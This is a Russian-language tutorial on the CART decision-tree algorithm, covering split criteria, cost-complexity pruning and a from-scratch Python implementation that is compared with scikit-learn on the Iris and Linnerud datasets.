Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9512 / Markets: 114689
Market Cap: $ 3 787 132 962 593 / 24h Vol: $ 200 392 171 953 / BTC Dominance: 58.653467328398%

Н Новости

Дерево решений (CART). От теоретических основ до продвинутых техник и реализации с нуля на Python

945006e6220f8603ce6498edd32b4581.png

Дерево решений CART (Classification and Regressoin Tree) — алгоритм классификации и регрессии, основанный на бинарном дереве и являющийся фундаментальным компонентом случайного леса и бустингов, которые входят в число самых мощных алгоритмов машинного обучения на сегодняшний день. Деревья также могут быть не бинарными в зависимости от реализации. К другим популярным реализациям решающего дерева относятся следующие: ID3, C4.5, C5.0.

Ноутбук с данными алгоритмами можно загрузить на Kaggle (eng) и GitHub (rus).

Структура дерева решений

Решающее дерево состоит из следующих компонентов: корневой узел, ветви (левая и правая), решающие и листовые (терминальные) узлы. Корневой и решающие узлы представляют из себя вопросы с пороговым значением для разделения тренировочного набора на части (левая и правая), а листья являются конечными прогнозами: среднее значений в листе для регрессии и статистическая мода для классификации.

Структура CART
Структура CART

Каждый листовой узел соответствует определённой прямоугольной области на графике границ решений между двумя признаками. Если на графике соседние участки имеют одинаковое значение, то они автоматически объединяются и представляются как одна большая область.

График границ решений
График границ решений

Выбор наилучшего разбиения

Выбор наилучшего разбиения при построении решающего узла в дереве напоминает игру, в которой нужно угадать знаменитость, задавая вопросы, на которые можно лишь услышать ответ "да" либо "нет". Логично, что для быстрого поиска правильного ответа необходимо задавать вопросы, которые исключат наибольшее количество неверных вариантов, например, вопрос про "пол" позволит исключить сразу же половину вариантов, в то время как вопрос про "возраст" будет менее информативным. Проще говоря, выбор наилучшего вопроса заключается в поиске признака, определённое значение которого лучше всего отделяет правильный ответ от неправильных.

Показатель того, насколько хорошо вопрос в решающем узле позволяет отделить верный ответ от неверных, называется мерой загрязнённости узла. В случае классификации для оценки качества разбиения узла используются следующие критерии:

  • Неопределённость (загрязнённость) Джини — мера разнообразия в распределении вероятностей классов. Если все элементы в узле принадлежат к одному классу, то неопределённость Джини равна 0, а в случае равномерного распределения классов в узле неопределённость Джини равна 0.5.

G_{i} = 1 - \sum\limits_{k = 1}^{n} P_{i,k}^{2}
  • Энтропия Шеннона — мера неопределённости или беспорядка классов в узле. Она характеризует количество информации, которое необходимо для описания состояния системы: чем выше значение энтропии, тем менее упорядочена система и наоборот.

S_{i} = - \sum\limits_{k = 1}^{n} P_{i,k} \ log_{2}P_{i,k}
  • Ошибка классификации — величина, отображающая долю неправильно классифицированных элементов в узле: чем меньше данное значение, тем меньше загрязнённость в узле.

E_{i} = 1 - max\ P_{i,k}

В данном случае P_{i, k} — это доля k-го класса среди обучающих образцов в i-ом узле.

На практике чаще всего используются неопределённость Джини и энтропия Шеннона за счёт большей информативности. Как видно из графика для случая бинарной классификации (где P+ — вероятность принадлежности к классу "+"), график удвоенной неопределённости Джини очень схож с графиком энтропии Шеннона: в первом случае будут получаться чуть менее сбалансированные деревья, однако при работе с большими датасетами неопределённость Джини более предпочтительна за счёт меньшей вычислительной сложности.

Код для отрисовки графика

import numpy as np
import matplotlib.pyplot as plt


def gini(probas):
    return np.array([1- (p ** 2 + (1-p) ** 2) for p in probas])


def entropy(probas):
    return np.array([-1 * (p * np.log2(p) + (1-p) * np.log2(1-p)) for p in probas])


def misclass_error_rate(probas):
    return np.array([1 - max([p, 1-p]) for p in probas])


probas = np.linspace(0, 1, 250)
plt.plot(probas, entropy(probas), label="Shannon's entropy")
plt.plot(probas, 2 * gini(probas),  label="Gini impurity x 2")
plt.plot(probas, 2 * misclass_error_rate(probas), label="Misclass error x 2")
plt.plot(probas, gini(probas), label="Gini impurity")
plt.plot(probas, misclass_error_rate(probas), label="Misclass error")
plt.title("Splitting criteria from P+ (binary classification case)")
plt.xlabel("P+")
plt.ylabel("Impurity")
plt.legend();
c904c8f96f5e22ab6d68d09fe69a4c1b.png

В случае регрессии для оценки качества разбиения узла чаще всего используется среднеквадратичная ошибка, но также могут быть использованы Friedman MSE и MAE.

Функция потерь

Так как же в конечном счёте происходит выбор наилучшего разбиения? После выбора одного из критериев оценки качества разбиения узла (например, неопределённость Джини или MSE), для всех уникальных значений признака берутся их пороговые значения, отсортированные по возрастанию и представленные как среднее арифметическое между соседними значениями. Далее обучающий набор разделяется на 2 поднабора (узла): всё что меньше либо равно текущего порогового значения идёт в левый поднабор, а всё что больше — в правый. Для полученных поднаборов рассчитываются загрязнённости на основе выбранного критерия, после чего их взвешенная сумма представляется как функция потерь, значение которой будет соответствовать пороговому значению признака. Порог с наименьшим значением функции потерь в обучающем наборе (поднаборе) будет наилучшим разбиением.

Функции потерь будут иметь следующий вид:

  • для классификации:

J(k, t_{k}) = \frac{N_{m}^{left}}{N_{m}} G_{left} + \frac{N_{m}^{right}}{N_{m}} G_{right}
  • для регрессии:

J(k, t_{k}) = \frac{N_{m}^{left}}{N_{m}} MSE_{left} + \frac{N_{m}^{right}}{N_{m}} MSE_{right}

где J(k, t_{k}) \to min.

В случае с энтропией используется немного иной подход: рассчитывается так называемый информационный прирост — разница энтропий родительского и дочерних узлов. Порог с максимальным информационным приростом в обучающем наборе/поднаборе будет соответствовать наилучшему разбиению. :

IG(Q) = S_{parent} - (\frac{N_{m}^{left}}{N_{m}} S_{child}^{left} + \frac{N_{m}^{right}}{N_{m}} S_{child}^{right}) \to max

где Q — условие (вопрос) для разбиения поднабора m.

Для наглядности рассмотрим следующий пример. Допустим, у нас есть 4 кота и 4 собаки, а также нам известны их некоторые визуальные признаки: "рост", "уши" (висячие и заострённые стоячие) и "усы" (наличие либо отсутствие). Как в дереве решений строится корневой узел для классификации собак и котов? Очень просто: сначала для каждого признака животные разделяются на 2 группы согласно вопросу, после чего для каждой из групп рассчитывается неопределённость Джини. Пороговое значение признака с наименьшим значением функции потерь (взвешенной суммой неопределённостей) будет использоваться для разбиения корневого (решающего) узла. В данном случае признак "рост" имеет наименьшую загрязнённость и вопрос в решающем узле будет выглядеть как "рост ⩽ 20 см".

Стоит добавить, что в случае с категориальными признаками происходит их бинаризация и вопросы выглядят следующим образом: "уши ⩽ 0.5", "усы ⩽ 0.5". Когда категориальные признаки могут принимать более 2 значений, применяются другие виды кодирования, например label или one-hot encoding.

6e329e78fd344316b7e461720a59a876.png

Принцип работы дерева решений (CART)

Алгоритм строится следующим образом:

  • 1) создаётся корневой узел на основе наилучшего разбиения;

  • 2) тренировочный набор разбивается на 2 поднабора: всё что соответствует условию разбиения отправляется в левый узел, остальное — в правый;

  • 3) далее рекурсивно для каждого тренировочного поднабора повторяются шаги 1-2 пока не будет достигнут один из основных критериев останова: максимальная глубина, максимальное количество листьев, минимальное количество наблюдений в листе или минимальное снижение загрязнения в узле.

Регуляризация дерева решений

Выращенная без ограничений древовидная структура в той или иной степени будет склонна к переобучению и для решения данной проблемы используется 2 подхода: pre-pruning (ограничение роста дерева во время построения любым из критериев останова) и post-pruning (отсечение лишних ветвей после полного построения). Второй подход является более деликатным так как позволяет получить несимметричную и более точную древовидную структуру, оставляя лишь самые информативные решающие узлы.

Существует 2 типа post-puning'а:

  • Top-down pruning — метод, при котором проверка и обрезка наименее информативных ветвей начинается с корневого узла. Данный метод обладает относительно низкой вычислительной сложностью, однако, как и в случае с pre-pruning'ом, его главным недостатком также является возможность недообучения за счёт удаления ветвей, которые могли потенциально содержать информативные узлы. К самым известным видам данного прунинга относятся следующие:

    • Pessimistic Error Pruning (PEP), когда обрезаются ветви с наибольшей ожидаемой ошибкой, порог которой устанавливается заранее;

    • Critical Value Pruning (CVP), когда обрезаются ветви, информативность которых меньше определённого критического значения.

  • Bottom-up pruning — метод, при котором проверка и обрезка наименее информативных ветвей начинается с листьев. В данном случае получаются более точные деревья за счёт полного обхода снизу-вверх и оценки каждого решающего узла, однако это приводит к увеличению вычислительной сложности. Самыми популярными видами данного прунинга являются следующие:

    • Minimum Error Pruning (MEP), когда происходит поиск дерева с наименьшей ожидаемой ошибкой на отложенной выборке;

    • Reduced Error Pruning (REP), когда решающие узлы удаляются до тех пор, пока не падает точность, измеренная на отложенной выборке;

    • Cost-complexity pruning (CCP), когда строится серия поддеревьев через удаление слабейших узлов в каждом из них с помощью коэффициента, рассчитанного как разность ошибки корневого узла поддерева и общей ошибки его листьев, а выбор наилучшего поддерева производится на тестовом наборе или с помощью k-fold кросс-валидации.

Дерево до и после post-pruning'а
Дерево до и после post-pruning'а

Minimal cost-complexity pruning

В реализации scikit-learn для деревьев решений используется модификация cost-complexity pruning, которая работает следующим образом:

  • 1) сначала строится полное дерево без ограничений;

  • 2) далее абсолютно для всех узлов в дереве рассчитывается ошибка на основе взвешенной загрязнённости в случае классификации или взвешенной MSE в случае регрессии;

  • 3) для каждого поддерева в дереве подсчитывается совокупная ошибка его листьев;

  • 4) для каждого поддерева в дереве рассчитывается коэффициент альфа, представленный как разность ошибки корневого узла поддерева и совокупная ошибка его листьев;

  • 5) поддерево с наименьшим \alpha_{ccp} удаляется и становится листовым узлом, а сам коэффициент хранится в массиве cost_complety_pruning_path и соответствует новому обрезанному дереву;

  • 6) шаги 2-5 рекурсивно повторяются для каждого поддерева до тех пор, пока обрезка не дойдёт до корневого узла.

Если задавать определённое значение \alpha_{ccp} изначально, то данный коэффициент применится к каждому поддереву и в итоге останется поддерево с наименьшей ошибкой среди всех поддеревьев, а выбор наилучшего \alpha_{ccp} из cost_complety_pruning_path для получения самого точного поддерева производится на тестовом наборе или с помощью k-fold кросс-валидации.

Формулы для расчётов

Регуляризация дерева:

R_\alpha(T) = R(T) + \alpha|\widetilde{T}|

Эффективный \alpha_{ccp}:

\alpha_{ccp} = \frac{R_{t} - R(T_{t})}{|T| - 1}

Ошибка решающего R_{t} или листового R(T) узлов для классификации:

R_{node} = \frac{N_{m}}{N} G_{m}

Ошибка решающего R_{t} или листового R(T) узлов для регрессии:

R_{node} = \frac{N_{m}}{N} MSE_{m}

Совокупная ошибка листьев в дереве/поддереве:

R(T_{t}) = \sum\limits_{i=1}^{n} R(T_{i})

T — число терминальных (листовых) узлов.

Схема работы cost-complexity pruning'а для простейшего дерева
Схема работы cost-complexity pruning'а для простейшего дерева

Импорт необходимых библиотек

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.datasets import load_linnerud
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, mean_absolute_percentage_error
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor, plot_tree
from mlxtend.plotting import plot_decision_regions
from copy import deepcopy
from pprint import pprint

Реализация на Python с нуля

В оригинальном дереве для создания узлов и хранения в них информации используется отдельный класс, но в данном случае дерево и вся информация об узлах хранятся в словаре с ключами в строчном формате. Такое изменение используется для возможности вывода полученного дерева и сравнения с реализацией scikit-learn.

class DecisionTreeCART:

    def __init__(self, max_depth=100, min_samples=2, ccp_alpha=0.0, regression=False):
        self.max_depth = max_depth
        self.min_samples = min_samples
        self.ccp_alpha = ccp_alpha
        self.regression = regression
        self.tree = None
        self._y_type = None
        self._num_all_samples = None

    def _set_df_type(self, X, y, dtype):
        X = X.astype(dtype)
        y = y.astype(dtype) if self.regression else y
        self._y_dtype = y.dtype

        return X, y

    @staticmethod
    def _purity(y):
        unique_classes = np.unique(y)

        return unique_classes.size == 1

    @staticmethod
    def _is_leaf_node(node):
        return not isinstance(node, dict)   # if a node/tree is a leaf

    def _leaf_node(self, y):
        class_index = 0

        return np.mean(y) if self.regression else y.mode()[class_index]

    def _split_df(self, X, y, feature, threshold):
        feature_values = X[feature]
        left_indexes = X[feature_values <= threshold].index
        right_indexes = X[feature_values > threshold].index
        sizes = np.array([left_indexes.size, right_indexes.size])

        return self._leaf_node(y) if any(sizes == 0) else left_indexes, right_indexes

    @staticmethod
    def _gini_impurity(y):
        _, counts_classes = np.unique(y, return_counts=True)
        squared_probabilities = np.square(counts_classes / y.size)
        gini_impurity = 1 - sum(squared_probabilities)

        return gini_impurity

    @staticmethod
    def _mse(y):
        mse = np.mean((y - y.mean()) ** 2)

        return mse

    @staticmethod
    def _cost_function(left_df, right_df, method):
        total_df_size = left_df.size + right_df.size
        p_left_df = left_df.size / total_df_size
        p_right_df = right_df.size / total_df_size
        J_left = method(left_df)
        J_right = method(right_df)
        J = p_left_df*J_left + p_right_df*J_right

        return J  # weighted Gini impurity or weighted mse (depends on a method)

    def _node_error_rate(self, y, method):
        if self._num_all_samples is None:
            self._num_all_samples = y.size   # num samples of all dataframe
        current_num_samples = y.size

        return current_num_samples / self._num_all_samples * method(y)

    def _best_split(self, X, y):
        features = X.columns
        min_cost_function = np.inf
        best_feature, best_threshold = None, None
        method = self._mse if self.regression else self._gini_impurity

        for feature in features:
            unique_feature_values = np.unique(X[feature])

            for i in range(1, len(unique_feature_values)):
                current_value = unique_feature_values[i]
                previous_value = unique_feature_values[i-1]
                threshold = (current_value + previous_value) / 2
                left_indexes, right_indexes = self._split_df(X, y, feature, threshold)
                left_labels, right_labels = y.loc[left_indexes], y.loc[right_indexes]
                current_J = self._cost_function(left_labels, right_labels, method)

                if current_J <= min_cost_function:
                    min_cost_function = current_J
                    best_feature = feature
                    best_threshold = threshold

        return best_feature, best_threshold

    def _stopping_conditions(self, y, depth, n_samples):
        return self._purity(y), depth == self.max_depth, n_samples < self.min_samples

    def _grow_tree(self, X, y, depth=0):
        current_num_samples = y.size
        X, y = self._set_df_type(X, y, np.float128)
        method = self._mse if self.regression else self._gini_impurity

        if any(self._stopping_conditions(y, depth, current_num_samples)):
            RTi = self._node_error_rate(y, method)   # leaf node error rate
            leaf_node = f'{self._leaf_node(y)} | error_rate {RTi}'
            return leaf_node

        Rt = self._node_error_rate(y, method)   # decision node error rate
        best_feature, best_threshold = self._best_split(X, y)
        decision_node = f'{best_feature} <= {best_threshold} | ' \
                        f'as_leaf {self._leaf_node(y)} error_rate {Rt}'

        left_indexes, right_indexes = self._split_df(X, y, best_feature, best_threshold)
        left_X, right_X = X.loc[left_indexes], X.loc[right_indexes]
        left_labels, right_labels = y.loc[left_indexes], y.loc[right_indexes]

        # recursive part
        tree = {decision_node: []}
        left_subtree = self._grow_tree(left_X, left_labels, depth+1)
        right_subtree = self._grow_tree(right_X, right_labels, depth+1)

        if left_subtree == right_subtree:
            tree = left_subtree
        else:
            tree[decision_node].extend([left_subtree, right_subtree])

        return tree

    def _tree_error_rate_info(self, tree, error_rates_list):
        if self._is_leaf_node(tree):
            *_, leaf_error_rate = tree.split()
            error_rates_list.append(np.float128(leaf_error_rate))
        else:
            decision_node = next(iter(tree))
            left_subtree, right_subtree = tree[decision_node]
            self._tree_error_rate_info(left_subtree, error_rates_list)
            self._tree_error_rate_info(right_subtree, error_rates_list)

        RT = sum(error_rates_list)   # total leaf error rate of a tree
        num_leaf_nodes = len(error_rates_list)

        return RT, num_leaf_nodes

    @staticmethod
    def _ccp_alpha_eff(decision_node_Rt, leaf_nodes_RTt, num_leafs):

        return (decision_node_Rt - leaf_nodes_RTt) / (num_leafs - 1)

    def _find_weakest_node(self, tree, weakest_node_info):
        if self._is_leaf_node(tree):
            return tree

        decision_node = next(iter(tree))
        left_subtree, right_subtree = tree[decision_node]
        *_, decision_node_error_rate = decision_node.split()

        Rt = np.float128(decision_node_error_rate)
        RTt, num_leaf_nodes = self._tree_error_rate_info(tree, [])
        ccp_alpha = self._ccp_alpha_eff(Rt, RTt, num_leaf_nodes)
        decision_node_index, min_ccp_alpha_index = 0, 1

        if ccp_alpha <= weakest_node_info[min_ccp_alpha_index]:
            weakest_node_info[decision_node_index] = decision_node
            weakest_node_info[min_ccp_alpha_index] = ccp_alpha

        self._find_weakest_node(left_subtree, weakest_node_info)
        self._find_weakest_node(right_subtree, weakest_node_info)

        return weakest_node_info

    def _prune_tree(self, tree, weakest_node):
        if self._is_leaf_node(tree):
            return tree

        decision_node = next(iter(tree))
        left_subtree, right_subtree = tree[decision_node]
        left_subtree_index, right_subtree_index = 0, 1
        _, leaf_node = weakest_node.split('as_leaf ')

        if weakest_node is decision_node:
            tree = weakest_node
        if weakest_node in left_subtree:
            tree[decision_node][left_subtree_index] = leaf_node
        if weakest_node in right_subtree:
            tree[decision_node][right_subtree_index] = leaf_node

        self._prune_tree(left_subtree, weakest_node)
        self._prune_tree(right_subtree, weakest_node)

        return tree

    def cost_complexity_pruning_path(self, X: pd.DataFrame, y: pd.Series):
        tree = self._grow_tree(X, y)   # grow a full tree
        tree_error_rate, _ = self._tree_error_rate_info(tree, [])
        error_rates = [tree_error_rate]
        ccp_alpha_list = [0.0]

        while not self._is_leaf_node(tree):
            initial_node = [None, np.inf]
            weakest_node, ccp_alpha = self._find_weakest_node(tree, initial_node)
            tree = self._prune_tree(tree, weakest_node)
            tree_error_rate, _ = self._tree_error_rate_info(tree, [])

            error_rates.append(tree_error_rate)
            ccp_alpha_list.append(ccp_alpha)

        return np.array(ccp_alpha_list), np.array(error_rates)

    def _ccp_tree_error_rate(self, tree_error_rate, num_leaf_nodes):

        return tree_error_rate + self.ccp_alpha*num_leaf_nodes   # regularization

    def _optimal_tree(self, X, y):
        tree = self._grow_tree(X, y)   # grow a full tree
        min_RT_alpha, final_tree = np.inf, None

        while not self._is_leaf_node(tree):
            RT, num_leaf_nodes = self._tree_error_rate_info(tree, [])
            current_RT_alpha = self._ccp_tree_error_rate(RT, num_leaf_nodes)

            if current_RT_alpha <= min_RT_alpha:
                min_RT_alpha = current_RT_alpha
                final_tree = deepcopy(tree)

            initial_node = [None, np.inf]
            weakest_node, _ = self._find_weakest_node(tree, initial_node)
            tree = self._prune_tree(tree, weakest_node)

        return final_tree

    def fit(self, X: pd.DataFrame, y: pd.Series):
        self.tree = self._optimal_tree(X, y)

    def _traverse_tree(self, sample, tree):
        if self._is_leaf_node(tree):
            leaf, *_ = tree.split()
            return leaf

        decision_node = next(iter(tree))  # dict key
        left_node, right_node = tree[decision_node]
        feature, other = decision_node.split(' <=')
        threshold, *_ = other.split()
        feature_value = sample[feature]

        if np.float128(feature_value) <= np.float128(threshold):
            next_node = self._traverse_tree(sample, left_node)    # left_node
        else:
            next_node = self._traverse_tree(sample, right_node)   # right_node

        return next_node

    def predict(self, samples: pd.DataFrame):
        # apply traverse_tree method for each row in a dataframe
        results = samples.apply(self._traverse_tree, args=(self.tree,), axis=1)

        return np.array(results.astype(self._y_dtype))

Код для отрисовки графиков

def tree_plot(sklearn_tree, Xa_train):
    plt.figure(figsize=(12, 18))  # customize according to the size of your tree
    plot_tree(sklearn_tree, feature_names=Xa_train.columns, filled=True, precision=6)
    plt.show()


def tree_scores_plot(estimator, ccp_alphas, train_data, test_data, metric, labels):
    train_scores, test_scores = [], []
    X_train, y_train = train_data
    X_test, y_test = test_data
    x_label, y_label = labels

    for ccp_alpha_i in ccp_alphas:
        estimator.ccp_alpha = ccp_alpha_i
        estimator.fit(X_train, y_train)
        train_pred_res = estimator.predict(X_train)
        test_pred_res = estimator.predict(X_test)

        train_score = metric(train_pred_res, y_train)
        test_score = metric(test_pred_res, y_test)
        train_scores.append(train_score)
        test_scores.append(test_score)

    fig, ax = plt.subplots()
    ax.set_xlabel(x_label)
    ax.set_ylabel(y_label)
    ax.set_title(f"{y_label} vs {x_label} for training and testing sets")
    ax.plot(ccp_alphas, train_scores, marker="o", label="train", drawstyle="steps-post")
    ax.plot(ccp_alphas, test_scores, marker="o", label="test", drawstyle="steps-post")
    ax.legend()
    plt.show()


def decision_boundary_plot(X, y, X_train, y_train, clf, feature_indexes, title=None):
    if y.dtype != 'int':
        y = pd.Series(LabelEncoder().fit_transform(y))
        y_train = pd.Series(LabelEncoder().fit_transform(y_train))

    feature1_name, feature2_name = X.columns[feature_indexes]
    X_feature_columns = X.values[:, feature_indexes]
    X_train_feature_columns = X_train.values[:, feature_indexes]
    clf.fit(X_train_feature_columns, y_train.values)

    plot_decision_regions(X=X_feature_columns, y=y.values, clf=clf)
    plt.xlabel(feature1_name)
    plt.ylabel(feature2_name)
    plt.title(title)

Загрузка датасетов

Для обучения моделей будет использован Iris dataset, где необходимо верно определить типы цветков на основе их признаков. В случае регрессии используется load_linnerud dataset из scikit-learn.

df_path = "/content/drive/MyDrive/iris.csv"
iris = pd.read_csv(df_path)
X1, y1 = iris.iloc[:, :-1], iris.iloc[:, -1]
X1_train, X1_test, y1_train, y1_test = train_test_split(X1, y1, test_size=0.3, random_state=0)
print(iris)


     sepal_length  sepal_width  petal_length  petal_width    species
0             5.1          3.5           1.4          0.2     setosa
1             4.9          3.0           1.4          0.2     setosa
2             4.7          3.2           1.3          0.2     setosa
3             4.6          3.1           1.5          0.2     setosa
4             5.0          3.6           1.4          0.2     setosa
..            ...          ...           ...          ...        ...
145           6.7          3.0           5.2          2.3  virginica
146           6.3          2.5           5.0          1.9  virginica
147           6.5          3.0           5.2          2.0  virginica
148           6.2          3.4           5.4          2.3  virginica
149           5.9          3.0           5.1          1.8  virginica

[150 rows x 5 columns]
X2, y2 = load_linnerud(return_X_y=True, as_frame=True)
y2 = y2['Pulse']
X2_train, X2_test, y2_train, y2_test = train_test_split(X2, y2, test_size=0.2, random_state=0)
print(X2, y2, sep='\n')


    Chins  Situps  Jumps
0     5.0   162.0   60.0
1     2.0   110.0   60.0
2    12.0   101.0  101.0
3    12.0   105.0   37.0
4    13.0   155.0   58.0
5     4.0   101.0   42.0
6     8.0   101.0   38.0
7     6.0   125.0   40.0
8    15.0   200.0   40.0
9    17.0   251.0  250.0
10   17.0   120.0   38.0
11   13.0   210.0  115.0
12   14.0   215.0  105.0
13    1.0    50.0   50.0
14    6.0    70.0   31.0
15   12.0   210.0  120.0
16    4.0    60.0   25.0
17   11.0   230.0   80.0
18   15.0   225.0   73.0
19    2.0   110.0   43.0

0     50.0
1     52.0
2     58.0
3     62.0
4     46.0
5     56.0
6     56.0
7     60.0
8     74.0
9     56.0
10    50.0
11    52.0
12    64.0
13    50.0
14    46.0
15    62.0
16    54.0
17    52.0
18    54.0
19    68.0
Name: Pulse, dtype: float64

Обучение моделей и оценка полученных результатов

В случае классификации дерево на данных ирис показало высокую точность. После прунинга точность не увеличилась, зато удалось найти более оптимальное дерево (alpha=0.0143) с такой же точностью и меньшим количеством узлов.

А вот в случае регрессии удалось получить прирост в плане точности, подобрав alpha=3.613, которое создаёт дерево с минимальной ошибкой на тестовом наборе. Все результаты приведены ниже.

Для более удобного отображения полученных результатов в ручных реализациях лучше использовать скачанный ноутбук в самом начале.

Классификация до прунинга

tree_classifier = DecisionTreeCART()
tree_classifier.fit(X1_train, y1_train)
clf_ccp_alphas, _ = tree_classifier.cost_complexity_pruning_path(X1_train, y1_train)
clf_ccp_alphas = clf_ccp_alphas[:-1]

sk_tree_classifier = DecisionTreeClassifier(random_state=0)
sk_tree_classifier.fit(X1_train, y1_train)
sk_clf_path = sk_tree_classifier.cost_complexity_pruning_path(X1_train, y1_train)
sk_clf_ccp_alphas = sk_clf_path.ccp_alphas[:-1]

sk_clf_estimator = DecisionTreeClassifier(random_state=0)
train1_data, test1_data = [X1_train, y1_train], [X1_test, y1_test]
metric = accuracy_score
labels = ['Alpha', 'Accuracy']

pprint(tree_classifier.tree, width=180)
tree_plot(sk_tree_classifier, X1_train)
print(f'tree alphas: {clf_ccp_alphas}', f'sklearn alphas: {sk_clf_ccp_alphas}', sep='\n')
tree_scores_plot(sk_clf_estimator, clf_ccp_alphas, train1_data, test1_data, metric, labels)


{'petal_width <= 0.75 | as_leaf virginica error_rate 0.6643083900226757': ['setosa | error_rate 0.0',
                                                                           {'petal_length <= 4.95 | as_leaf virginica error_rate 0.33480885311871234': [{'petal_width <= 1.65 | as_leaf versicolor error_rate 0.0521008403361345': ['versicolor '
                                                                                                                                                                                                                                    '| '
                                                                                                                                                                                                                                    'error_rate '
                                                                                                                                                                                                                                    '0.0',
                                                                                                                                                                                                                                    {'sepal_width <= 3.1 | as_leaf virginica error_rate 0.014285714285714287': ['virginica '
                                                                                                                                                                                                                                                                                                                '| '
                                                                                                                                                                                                                                                                                                                'error_rate '
                                                                                                                                                                                                                                                                                                                '0.0',
                                                                                                                                                                                                                                                                                                                'versicolor '
                                                                                                                                                                                                                                                                                                                '| '
                                                                                                                                                                                                                                                                                                                'error_rate '
                                                                                                                                                                                                                                                                                                                '0.0']}]},
                                                                                                                                                        {'petal_width <= 1.75 | as_leaf virginica error_rate 0.018532818532818515': [{'petal_width <= 1.65 | as_leaf virginica error_rate 0.014285714285714287': ['virginica '
                                                                                                                                                                                                                                                                                                                  '| '
                                                                                                                                                                                                                                                                                                                  'error_rate '
                                                                                                                                                                                                                                                                                                                  '0.0',
                                                                                                                                                                                                                                                                                                                  'versicolor '
                                                                                                                                                                                                                                                                                                                  '| '
                                                                                                                                                                                                                                                                                                                  'error_rate '
                                                                                                                                                                                                                                                                                                                  '0.0']},
                                                                                                                                                                                                                                     'virginica '
                                                                                                                                                                                                                                     '| '
                                                                                                                                                                                                                                     'error_rate '
                                                                                                                                                                                                                                     '0.0']}]}]}
aee7bf13a2513a81096daeee904619dd.png
tree alphas: [0.         0.00926641 0.01428571 0.03781513 0.26417519]
sklearn alphas: [0.         0.00926641 0.01428571 0.03781513 0.26417519]
b8f2125685fd271a643cb3648fc7bec8.png

Классификация после прунинга

tree_clf_prediction = tree_classifier.predict(X1_test)
tree_clf_accuracy = accuracy_score(tree_clf_prediction, y1_test)
sk_tree_clf_prediction = sk_tree_classifier.predict(X1_test)
sk_clf_accuracy = accuracy_score(sk_tree_clf_prediction, y1_test)

best_clf_ccp_alpha = 0.0143 # based on a plot
best_tree_classifier = DecisionTreeCART(ccp_alpha=best_clf_ccp_alpha)
best_tree_classifier.fit(X1_train, y1_train)
best_tree_clf_prediction = best_tree_classifier.predict(X1_test)
best_tree_clf_accuracy = accuracy_score(best_tree_clf_prediction, y1_test)

best_sk_tree_classifier = DecisionTreeClassifier(random_state=0, ccp_alpha=best_clf_ccp_alpha)
best_sk_tree_classifier.fit(X1_train, y1_train)
best_sk_tree_clf_prediction = best_sk_tree_classifier.predict(X1_test)
best_sk_clf_accuracy = accuracy_score(best_sk_tree_clf_prediction, y1_test)

print('tree prediction', tree_clf_prediction, ' ', sep='\n')
print('sklearn prediction', sk_tree_clf_prediction, ' ', sep='\n')
print('best tree prediction', best_tree_clf_prediction, ' ', sep='\n')
print('best sklearn prediction', best_sk_tree_clf_prediction, ' ', sep='\n')

pprint(best_tree_classifier.tree, width=180)
tree_plot(best_sk_tree_classifier, X1_train)
print(f'our tree pruning accuracy: before {tree_clf_accuracy} -> after {best_tree_clf_accuracy}')
print(f'sklearn tree pruning accuracy: before {sk_clf_accuracy} -> after {best_sk_clf_accuracy}')


tree prediction
['virginica' 'versicolor' 'setosa' 'virginica' 'setosa' 'virginica'
 'setosa' 'versicolor' 'versicolor' 'versicolor' 'virginica' 'versicolor'
 'versicolor' 'versicolor' 'versicolor' 'setosa' 'versicolor' 'versicolor'
 'setosa' 'setosa' 'virginica' 'versicolor' 'setosa' 'setosa' 'virginica'
 'setosa' 'setosa' 'versicolor' 'versicolor' 'setosa' 'virginica'
 'versicolor' 'setosa' 'virginica' 'virginica' 'versicolor' 'setosa'
 'virginica' 'versicolor' 'versicolor' 'virginica' 'setosa' 'virginica'
 'setosa' 'setosa']
 
sklearn prediction
['virginica' 'versicolor' 'setosa' 'virginica' 'setosa' 'virginica'
 'setosa' 'versicolor' 'versicolor' 'versicolor' 'virginica' 'versicolor'
 'versicolor' 'versicolor' 'versicolor' 'setosa' 'versicolor' 'versicolor'
 'setosa' 'setosa' 'virginica' 'versicolor' 'setosa' 'setosa' 'virginica'
 'setosa' 'setosa' 'versicolor' 'versicolor' 'setosa' 'virginica'
 'versicolor' 'setosa' 'virginica' 'virginica' 'versicolor' 'setosa'
 'virginica' 'versicolor' 'versicolor' 'virginica' 'setosa' 'virginica'
 'setosa' 'setosa']
 
best tree prediction
['virginica' 'versicolor' 'setosa' 'virginica' 'setosa' 'virginica'
 'setosa' 'versicolor' 'versicolor' 'versicolor' 'virginica' 'versicolor'
 'versicolor' 'versicolor' 'versicolor' 'setosa' 'versicolor' 'versicolor'
 'setosa' 'setosa' 'virginica' 'versicolor' 'setosa' 'setosa' 'virginica'
 'setosa' 'setosa' 'versicolor' 'versicolor' 'setosa' 'virginica'
 'versicolor' 'setosa' 'virginica' 'virginica' 'versicolor' 'setosa'
 'virginica' 'versicolor' 'versicolor' 'virginica' 'setosa' 'virginica'
 'setosa' 'setosa']
 
best sklearn prediction
['virginica' 'versicolor' 'setosa' 'virginica' 'setosa' 'virginica'
 'setosa' 'versicolor' 'versicolor' 'versicolor' 'virginica' 'versicolor'
 'versicolor' 'versicolor' 'versicolor' 'setosa' 'versicolor' 'versicolor'
 'setosa' 'setosa' 'virginica' 'versicolor' 'setosa' 'setosa' 'virginica'
 'setosa' 'setosa' 'versicolor' 'versicolor' 'setosa' 'virginica'
 'versicolor' 'setosa' 'virginica' 'virginica' 'versicolor' 'setosa'
 'virginica' 'versicolor' 'versicolor' 'virginica' 'setosa' 'virginica'
 'setosa' 'setosa']
 
{'petal_width <= 0.75 | as_leaf virginica error_rate 0.6643083900226757': ['setosa | error_rate 0.0',
                                                                           {'petal_length <= 4.95 | as_leaf virginica error_rate 0.33480885311871234': [{'petal_width <= 1.65 | as_leaf versicolor error_rate 0.0521008403361345': ['versicolor '
                                                                                                                                                                                                                                    '| '
                                                                                                                                                                                                                                    'error_rate '
                                                                                                                                                                                                                                    '0.0',
                                                                                                                                                                                                                                    'virginica '
                                                                                                                                                                                                                                    'error_rate '
                                                                                                                                                                                                                                    '0.014285714285714287']},
